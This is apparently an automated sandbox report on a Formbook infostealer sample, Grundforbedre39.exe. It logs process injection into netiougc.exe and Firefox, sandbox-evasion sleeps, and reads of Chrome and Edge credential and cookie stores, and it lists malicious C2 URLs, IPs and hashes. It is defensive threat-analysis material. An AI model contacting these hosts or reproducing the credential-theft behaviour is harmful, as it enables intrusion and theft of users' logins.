Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Section loaded: rasadhlp.dll	Jump to behavior

Uses 32bit PE files

Source: Grundforbedre39.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 00000019.00000002.5892016375.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.5887373637.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.5892807319.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1279164974.0000000038030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.5894036244.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.5893764662.0000000002B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.1278316788.00000000351C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/10@60/12

Source: C:\Users\user\Desktop\Grundforbedre39.exe

0_2_0040326A

Source: C:\Users\user\Desktop\Grundforbedre39.exe

Code function: 0_2_00404579 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,

0_2_00404579

Source: C:\Users\user\Desktop\Grundforbedre39.exe

Code function: 0_2_00402095 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,

0_2_00402095

Source: C:\Users\user\Desktop\Grundforbedre39.exe

File created: C:\Users\user\Pictures\industrialisere

Source: unknown	Process created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Process created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Process created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exe
Source: C:\Windows\SysWOW64\netiougc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Process created: C:\Users\user\Desktop\Grundforbedre39.exe C:\Users\user\Desktop\Grundforbedre39.exe	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Process created: C:\Windows\SysWOW64\netiougc.exe C:\Windows\SysWOW64\netiougc.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D47CDA pushad ; retf	9_2_04D47CDB
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D53C09 pushfd ; ret	9_2_04D53C18
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D58D72 push edx; iretd	9_2_04D58D79
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D42D7D push ecx; retf	9_2_04D42D7E
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D3B6EF push ebp; iretd	9_2_04D3B705
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D63696 push eax; ret	9_2_04D63698
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D59641 push eax; ret	9_2_04D59645
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D3B70D push ebp; iretd	9_2_04D3B705
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D388F8 push eax; ret	9_2_04D38900
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4D0A7 push edi; iretd	9_2_04D4D0B0
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D3B971 push ebp; retf	9_2_04D3B976
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4E11B pushfd ; retf	9_2_04D4E133
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D5393A push ds; ret	9_2_04D5393C
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4FBD6 push ebx; retf	9_2_04D4FBEB
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D4FBF3 push ebx; retf	9_2_04D4FBEB
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe	Code function: 9_2_04D393AF push ecx; retf	9_2_04D393B1

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688	Thread sleep count: 120 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688	Thread sleep count: 9852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688	Thread sleep time: -19704000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804	Thread sleep time: -110000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804	Thread sleep time: -52000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804	Thread sleep time: -43500s >= -30000s	Jump to behavior

Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Grundforbedre39.exe, 00000004.00000002.1264916948.0000000005231000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6B

Source: C:\Users\user\Desktop\Grundforbedre39.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Grundforbedre39.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Grundforbedre39.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netiougc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netiougc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
142.251.41.14	drive.google.com	United States	15169	GOOGLEUS	false
172.67.158.92	www.noonartists.com	United States	13335	CLOUDFLARENETUS	true
195.110.124.133	guiguigohost.com	Italy	39729	REGISTER-ASIT	true
198.177.123.106	www.alpinebretech.life	United States	395681	FINALFRONTIERVG	true
142.250.65.161	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
46.30.215.63	www.manupaint.com	Denmark	51468	ONECOMDK	true
84.32.84.32	feshi.store	Lithuania	33922	NTT-LT-ASLT	true
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
192.151.224.197	0dc4ed.qsnode301.com	United States	40065	CNSERVERSUS	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
156.232.32.175	www.t3c1srf.site	Seychelles	8100	ASN-QUADRANET-GLOBALUS	false
172.67.130.3	www.wbyzm5.buzz	United States	13335	CLOUDFLARENETUS	true

Name	Malicious	Antivirus Detection	Reputation
http://www.manupaint.com/m9so/?LFPxWlV=m6UyvjwF3oTc9mpt4zzouUyt4wyp2f6ZfkzWWV4sWvW1x6m/mlP+bPsAbLgCLm9kLblRESTeyUV8keP8D1W8Y1T847xmA9ATcClw/k+cOpuPGr7qZ2xBz7I=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.wbyzm5.buzz/m9so/	true	Avira URL Cloud: safe	unknown
http://www.wbyzm5.buzz/m9so/?LFPxWlV=m/+4sInKRUCBr4G0qRueLBh/JRgfrGd1CLcm3iGGUHJib9fBZO/vQs/EedckMLPR1G/2qi8YD1/iBxsP0/EJoTSgX51ucE1l7Q2MujCVII/KP9Y5kFBINaU=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.teenpattimasterapp.org/m9so/	true	Avira URL Cloud: safe	unknown
http://www.plainpathproductions.com/m9so/?LFPxWlV=c3dPWH5xU9RuE2iPYX/YJd5aP2cwjKm8nfGtIgIly07Hn5MDdL5huHRSG1wDYayNCeUJMK+qa7csQOwAA/itbsq5+k4WWz6YXZNbnqhrlmQsoR/1yVl4O5E=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.manupaint.com/m9so/	true	Avira URL Cloud: safe	unknown
http://www.noonartists.com/m9so/?LFPxWlV=9P8aNyK7O05KJ0jKHbPRuL/6tE36LZhqsdPS0VQWTno4TxKFvlSv59XV3DTl0RUh0Aj2hIyEwvndA3yjgkFupZwaxdFmxRojdXOoN+OGLdCgXGIMDQ+6EgE=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.alpinebretech.life/m9so/	true	Avira URL Cloud: safe	unknown
http://www.feshi.store/m9so/	true	Avira URL Cloud: safe	unknown
http://www.meliorras.com/m9so/?LFPxWlV=hV0gUtH6eivuG6a1gtKJKPXk2w7TZurpdSJvAkXahnCKr3ZNP6l/DgROigVMeqNmcpawXvZwG91uaBFQ9vCDEXt4463W6r+4wKZPe4czMIeO7JeDEKZ34NE=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.plainpathproductions.com/m9so/	true	Avira URL Cloud: safe	unknown
http://www.feshi.store/m9so/?LFPxWlV=1Qsa/7J+srdsR8Dz/ES5S27r13qOWkq23euP4yB+JqRfE/nsbLJ5FW7PdqHJizPjrTq31E4BOQDA72YgssNaoReb8a5kH4cRUYabd93Dw2rUjSskRvR+x9I=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.guiguigohost.com/m9so/	true	Avira URL Cloud: malware	unknown
http://www.cyberpsychsecurity.com/m9so/	true	Avira URL Cloud: safe	unknown
http://www.alpinebretech.life/m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.cyberpsychsecurity.com/m9so/?LFPxWlV=jovxqEZjMvfd7zz2mTvvE1OonaQx4w6Z/02MEDusjhfET0PBGFNNsERdDgiHq90zA+FiNHbHunAjmlnnTBHWzyxLPlfgZ5XyFdT5RHsnhVfKl1JVA017Cgw=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown
http://www.meliorras.com/m9so/	true	Avira URL Cloud: safe	unknown
http://www.teenpattimasterapp.org/m9so/?LFPxWlV=Jw+Ed+ZUGSr/+oJmj9kqbUJ4ViEG6A6UoqQX6gR3ieyHczkITEu4GAJNfTznjio58VSbv2GXL5IQ0LBvochodTMqi4TIQu8e5uWV6iD6Y5Xd5nwlY+1LHT8=&OBLTJ=U4yhXH6x-jhX	true	Avira URL Cloud: safe	unknown

ID:	1410990
Product:	CloudBasic
Start time:	14:43:54
Start date:	18.03.2024
Sample:	Grundforbedre39.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	0190a49f09dc90c7dc61959581be1e9f
SHA1:	af5d8cfa73b77d96d3a489f5961cdab87c8339be
SHA256:	cfa3c71c41d7a69fdfa223a92ec677067613c69b2b2627d760cda587725bfbf0
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\4KM2yMOK9O	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7	24937DB267D854F3EF5453E2E54EA21B	F519A77A669D9F706D5D537A203B7245368D40CE	369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	A4DD044BCD94E9B3370CCF095B31F896	17C78201323AB2095BC53184AA8267C9187D5173	2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
